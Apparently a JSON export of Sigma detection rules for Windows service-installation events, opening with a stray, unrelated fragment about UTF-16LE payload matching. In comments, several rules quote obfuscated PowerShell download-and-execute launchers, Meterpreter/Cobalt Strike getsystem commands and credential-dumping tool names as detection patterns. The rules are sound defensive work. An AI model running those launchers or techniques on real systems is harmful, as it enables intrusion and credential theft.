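Run as a script, every alignment of the UTF-16LE payload matches with utf16le=True and none with utf16le=False; the raw-byte fragments only match a blob that encoded the stager as ASCII/UTF-8. Before relying on selection4, confirm which encoding the lateral-movement method you expect actually produces and derive the fragments from that one.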
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_defender_disabled.yml",
    "content": "title: Windows Defender Threat Detection Service Disabled\nid: 6c0a7755-6d31-44fa-80e1-133e57752680\nrelated:\n    - id: fe34868f-6e0e-4882-81f6-c43aa8f15b62\n      type: derived\nstatus: stable\ndescription: Detects when the \"Windows Defender Antivirus Service\" is reported as stopped via Service Control Manager event 7036, i.e. when Defender threat protection is no longer running.\nreferences:\n    - https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: Ján Trenčanský, frack113\ndate: 2020-07-28\nmodified: 2024-07-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 7036\n        Provider_Name: 'Service Control Manager'\n        # Note: The service name and messages are localized\n        param1:\n            - 'Windows Defender Antivirus Service'\n            - 'Service antivirus Microsoft Defender' # French OS\n        param2:\n            - 'stopped'\n            - 'arrêté' # French OS\n    condition: selection\nfalsepositives:\n    - Administrator actions\n    - Auto updates of Windows Defender cause restarts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_hack_smbexec.yml",
    "content": "title: smbexec.py Service Installation\nid: 52a85084-6989-40c3-8f32-091e12e13f09\nstatus: test\ndescription: Detects the use of smbexec.py tool by detecting a specific service installation\nreferences:\n    - https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/\n    - https://github.com/fortra/impacket/blob/33058eb2fde6976ea62e04bc7d6b629d64d44712/examples/smbexec.py#L286-L296\n    - https://github.com/fortra/impacket/blob/edef71f17bc1240f9f8c957bbda98662951ac3ec/examples/smbexec.py#L60 # Old service name\nauthor: Omer Faruk Celik\ndate: 2018-03-20\nmodified: 2023-11-09\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1021.002\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service_name:\n        ServiceName: 'BTOBTO'\n    selection_service_image:\n        ImagePath|contains:\n            - '.bat & del '\n            - '__output 2^>^&1 >'\n    condition: selection_eid and 1 of selection_service_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_clip_services.yml",
    "content": "title: Invoke-Obfuscation CLIP+ Launcher - System\nid: f7385ee2-0e0c-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of Clip.exe to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 26)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-13\nmodified: 2023-02-20\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - 'cmd'\n            - '&&'\n            - 'clipboard]::'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_obfuscated_iex_services.yml",
    "content": "title: Invoke-Obfuscation Obfuscated IEX Invocation - System\nid: 51aa9387-1c53-4153-91cc-d73c59ae1ca9\nstatus: test\ndescription: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references\nreferences:\n    - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888\nauthor: Daniel Bohannon (@Mandiant/@FireEye), oscd.community\ndate: 2019-11-08\nmodified: 2022-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1027\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        EventID: 7045\n    selection_imagepath:\n        - ImagePath|re: '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\['\n        - ImagePath|re: '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\['\n        - ImagePath|re: '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\['\n        - ImagePath|re: '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}'\n        - ImagePath|re: '\\\\*mdr\\*\\W\\s*\\)\\.Name'\n        - ImagePath|re: '\\$VerbosePreference\\.ToString\\('\n        - ImagePath|re: '\\String\\]\\s*\\$VerbosePreference'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml",
    "content": "title: Invoke-Obfuscation STDIN+ Launcher - System\nid: 72862bf2-0eb1-11eb-adc1-0242ac120002\nstatus: test\ndescription: Detects Obfuscated use of stdin to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 25)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_main:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        # ImagePath|re: 'cmd.{0,5}(?:\\/c|\\/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\\\"'\n        # Example 1: c:\\windows\\sYstEm32\\CmD.eXE /C\"echO\\Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -NoEXiT -\"\n        # Example 2: c:\\WiNDOws\\sysTEm32\\cmd.EXe /C \" ECHo Invoke-Expression (New-Object Net.WebClient).DownloadString | POwersHELl -nol ${EXEcUtIONCONTeXT}.INvOkEComMANd.InvOKEScRIPt( $InpUt )\"\n        ImagePath|contains|all:\n            - 'cmd'\n            - 'powershell'\n        ImagePath|contains:\n            - '/c'\n            - '/r'\n    selection_other:\n        - ImagePath|contains: 'noexit'\n        - ImagePath|contains|all:\n              - 'input'\n              - '$'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_var_services.yml",
    "content": "title: Invoke-Obfuscation VAR+ Launcher - System\nid: 8ca7004b-e620-4ecb-870e-86129b5b8e75\nstatus: test\ndescription: Detects Obfuscated use of Environment Variables to execute PowerShell\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009  # (Task 24)\nauthor: Jonathan Cheong, oscd.community\ndate: 2020-10-15\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        # ImagePath|re: 'cmd.{0,5}(?:\\/c|\\/r)(?:\\s|)\\\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\\\"\\s+?\\-f(?:.*\\)){1,}.*\\\"'\n        # Example 1: C:\\winDoWs\\SySTeM32\\cmd.Exe /C\"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\\\"{2}{3}{0}{1}\\\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\\\"IN`VO`KecOmMaND\\\".\\\"inVo`KES`crIPt\\\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\\\"{1}{4}{2}{3}{0}\\\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \\\"{0}{1}\\\"-f'n','oti' ),( \\\"{0}{1}\\\" -f'pRoC','esS') )) )\"\n        # Example 2: cMD.exe /C \"seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\\\"{1}{0}{2}{3}\\\" -f 'eT-vaR','G','iab','lE' ) (\\\"{0}{1}\\\" -f '*m','DR*' ) ).\\\"na`ME\\\"[3,11,2]-JOIN'' ) ( ( ^&(\\\"{0}{1}\\\" -f'g','CI' ) (\\\"{0}{1}\\\" -f 'ENV',':SlDb' ) ).\\\"VA`luE\\\" ) \"\n        ImagePath|contains|all:\n            - 'cmd'\n            - '\"set'\n            - '-f'\n        ImagePath|contains:\n            - '/c'\n            - '/r'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_compress_services.yml",
    "content": "title: Invoke-Obfuscation COMPRESS OBFUSCATION - System\nid: 175997c5-803c-4b08-8bb0-70b099f47595\nstatus: test\ndescription: Detects Obfuscated Powershell via COMPRESS OBFUSCATION\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - 'new-object'\n            - 'text.encoding]::ascii'\n            - 'readtoend'\n        ImagePath|contains:\n            - ':system.io.compression.deflatestream'\n            - 'system.io.streamreader'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_rundll_services.yml",
    "content": "title: Invoke-Obfuscation RUNDLL LAUNCHER - System\nid: 11b52f18-aaec-4d60-9143-5dd8cc4706b9\nstatus: test\ndescription: Detects Obfuscated Powershell via RUNDLL LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-18\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - 'rundll32.exe'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n            - 'powershell'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_stdin_services.yml",
    "content": "title: Invoke-Obfuscation Via Stdin - System\nid: 487c7524-f892-4054-b263-8a0ace63fc25\nstatus: test\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-12\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        # ImagePath|re: '(?i)(set).*&&\\s?set.*(environment|invoke|\\${?input).*&&.*\"'\n        ImagePath|contains|all:\n            - 'set'\n            - '&&'\n        ImagePath|contains:\n            - 'environment'\n            - 'invoke'\n            - 'input'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip - System\nid: 63e3365d-4824-42d8-8b82-e56810fefa0c\nstatus: test\ndescription: Detects obfuscated PowerShell that is launched via Clip.exe in scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains: '(Clipboard|i'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_mshta_services.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA - System\nid: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4\nstatus: test\ndescription: Detects obfuscated PowerShell that is launched via MSHTA in scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - 'mshta'\n            - 'vbscript:createobject'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_rundll32_services.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32 - System\nid: 641a4bfb-c017-44f7-800c-2aee0184ce9b\nstatus: test\ndescription: Detects obfuscated PowerShell that is launched via Rundll32 in scripts\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task30)\nauthor: Nikita Nazarov, oscd.community\ndate: 2020-10-09\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains|all:\n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        ImagePath|contains:\n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_var_services.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System\nid: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6\nstatus: test\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27)\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020-10-13\nmodified: 2022-11-29\ntags:\n    - attack.defense-evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        # ImagePath|re: '(?i)&&set.*(\\{\\d\\}){2,}\\\\\\\"\\s+?\\-f.*&&.*cmd.*\\/c' # FPs with |\\/r\n        # Example 1: CMD /C\"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\\wINDowS\\sYsWow64\\winDOWspoWERSheLl\\V1.0\\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\\\"invo`kEcoMm`A`ND\\\".( \\\"{2}{1}{0}\\\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \\\"{0}{1}\\\" -f'D','IR' ) ( \\\"{0}{1}\\\"-f'ENV:kU','R')).\\\"vAl`Ue\\\" )&& CMD /C%mXI%\"\n        # Example 2: c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C \"sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\\\"{2}{0}{1}\\\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \\\"{2}{3}{0}{1}\\\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \\\"{2}{5}{0}{1}{6}{4}{3}\\\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \\\"{0}{1}\\\"-f'd','ejLz' ),( \\\"{1}{2}{0}\\\"-f'cEss','P','RO') )) )&& c:\\WiNDOWS\\sYSTEm32\\CmD.exE /C %ybkm%\"\n        ImagePath|contains|all:\n            - '&&set'\n            - 'cmd'\n            - '/c'\n            - '-f'\n        ImagePath|contains:\n            - '{0}'\n            - '{1}'\n            - '{2}'\n            - '{3}'\n            - '{4}'\n            - '{5}'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_krbrelayup_service_installation.yml",
    "content": "title: KrbRelayUp Service Installation\nid: e97d9903-53b2-41fc-8cb9-889ed4093e80\nstatus: test\ndescription: Detects service creation by the KrbRelayUp tool, used for privilege escalation in Windows domain environments where LDAP signing is not enforced (the default setting)\nreferences:\n    - https://github.com/Dec0ne/KrbRelayUp\nauthor: Sittikorn S, Tim Shelton\ndate: 2022-05-11\nmodified: 2022-10-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        EventID: 7045\n        ServiceName: 'KrbSCM'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_mal_creddumper.yml",
    "content": "title: Credential Dumping Tools Service Execution - System\nid: 4976aa50-8f41-45c6-8b15-ab3fc10e79ed\nstatus: test\ndescription: Detects well-known credential dumping tools execution via service execution events\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community\ndate: 2017-03-05\nmodified: 2022-11-29\ntags:\n    - attack.credential-access\n    - attack.execution\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.004\n    - attack.t1003.005\n    - attack.t1003.006\n    - attack.t1569.002\n    - attack.s0005\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains:\n            - 'cachedump'\n            - 'dumpsvc'\n            - 'fgexec'\n            - 'gsecdump'\n            - 'mimidrv'\n            - 'pwdump'\n            - 'servpw'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using credential dumping tool for password recovery\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml",
    "content": "title: Meterpreter or Cobalt Strike Getsystem Service Installation - System\nid: 843544a7-56e0-4dcc-a44f-5cc266dd97d6\nstatus: test\ndescription: Detects the use of the getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nauthor: Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)\ndate: 2019-10-26\nmodified: 2023-11-15\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1134.001\n    - attack.t1134.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_id:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_cli_cmd:\n        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): C:\\Windows\\system32\\cmd.exe /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        ImagePath|contains|all:\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        ImagePath|contains:\n            - 'cmd'\n            - '%COMSPEC%'\n    selection_cli_rundll:\n        # meterpreter getsystem technique 2: rundll32.exe C:\\Users\\test\\AppData\\Local\\Temp\\tmexsn.dll,a /p:tmexsn\n        ImagePath|contains|all:\n            - 'rundll32'\n            - '.dll,a'\n            - '/p:'\n    selection_cli_share:\n        ImagePath|startswith: '\\\\\\\\127.0.0.1\\\\ADMIN$\\'  # https://twitter.com/svch0st/status/1413688851877416960?lang=en\n    condition: selection_id and 1 of selection_cli_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_moriya_rootkit.yml",
    "content": "title: Moriya Rootkit - System\nid: 25b9c01c-350d-4b95-bed1-836d04a4f324\nstatus: test\ndescription: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report\nreferences:\n    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831\nauthor: Bhabesh Raj\ndate: 2021-05-06\nmodified: 2022-11-29\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: ZzNetSvc\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_powershell_script_installed_as_service.yml",
    "content": "title: PowerShell Scripts Installed as Services\nid: a2e5019d-a658-4c6a-92bf-7197b54e2cae\nstatus: test\ndescription: Detects powershell script installed as a Service\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nauthor: oscd.community, Natalia Shornikova\ndate: 2020-10-06\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains:\n            - 'powershell'\n            - 'pwsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_anydesk.yml",
    "content": "title: Anydesk Remote Access Software Service Installation\nid: 530a6faa-ff3d-4022-b315-50828e77eef5\nstatus: test\ndescription: Detects the installation of the AnyDesk software service, which could be an indication of AnyDesk abuse if the software isn't already in use.\nreferences:\n    - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n    - https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-08-11\nmodified: 2025-02-24\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_provider:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ServiceName|contains|all:\n              - 'AnyDesk' # Covers both AnyDesk Service and AnyDesk MSI Service\n              - 'Service'\n        - ImagePath|contains: 'AnyDesk'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the AnyDesk tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_csexecsvc.yml",
    "content": "title: CSExec Service Installation\nid: a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12\nstatus: test\ndescription: Detects CSExec service installation and execution events\nreferences:\n    - https://github.com/malcomvetter/CSExec\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-07\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ServiceName: 'csexecsvc'\n        - ImagePath|endswith: '\\csexecsvc.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_hacktools.yml",
    "content": "title: HackTool Service Registration or Execution\nid: d26ce60c-2151-403c-9a42-49420d87b5e4\nstatus: test\ndescription: Detects installation or execution of services whose name or image path matches known hacktools\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-21\nmodified: 2023-08-07\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID:\n            - 7045\n            - 7036\n    selection_service_name:\n        ServiceName|contains:\n            - 'cachedump'\n            - 'DumpSvc'\n            - 'gsecdump'\n            - 'pwdump'\n            - 'UACBypassedService'\n            - 'WCE SERVICE'\n            - 'WCESERVICE'\n            - 'winexesvc'\n    selection_service_image:\n        ImagePath|contains: 'bypass' # https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82#file-scmuacbypass-cpp-L159\n    condition: selection_eid and 1 of selection_service_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml",
    "content": "title: Mesh Agent Service Installation\nid: e0d1ad53-c7eb-48ec-a87a-72393cc6cedc\nstatus: test\ndescription: Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers\nreferences:\n    - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-28\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: 'MeshAgent.exe'\n        - ServiceName|contains: 'Mesh Agent'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml",
    "content": "title: NetSupport Manager Service Install\nid: 2d510d8d-912b-45c5-b1df-36faa3d8c3f4\nstatus: test\ndescription: Detects NetSupport Manager service installation on the target system.\nreferences:\n    - http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-31\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: system\ndetection:\n    # Example:\n    #   <EventData>\n    #       <Data Name=\"ServiceName\">Client32</Data>\n    #       <Data Name=\"ImagePath\">\"C:\\Program Files (x86)\\NetSupport\\NetSupport Manager\\client32.exe\" /* *</Data>\n    #       <Data Name=\"ServiceType\">user mode service</Data>\n    #       <Data Name=\"StartType\">auto start</Data>\n    #       <Data Name=\"AccountName\">LocalSystem</Data>\n    #   </EventData>\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: '\\NetSupport Manager\\client32.exe'\n        - ServiceName: 'Client32'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_paexec.yml",
    "content": "title: PAExec Service Installation\nid: de7ce410-b3fb-4e8a-b38c-3b999e2c3420\nstatus: test\ndescription: Detects PAExec service installation\nreferences:\n    - https://www.poweradmin.com/paexec/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_image:\n        - ServiceName|startswith: 'PAExec-'\n        - ImagePath|startswith: 'C:\\WINDOWS\\PAExec-'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml",
    "content": "title: New PDQDeploy Service - Server Side\nid: ee9ca27c-9bd7-4cee-9b01-6e906be7cae3\nstatus: test\ndescription: |\n    Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\n    PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\nreferences:\n    - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-22\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: 'PDQDeployService.exe'\n        - ServiceName:\n              - 'PDQDeploy'\n              - 'PDQ Deploy'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml",
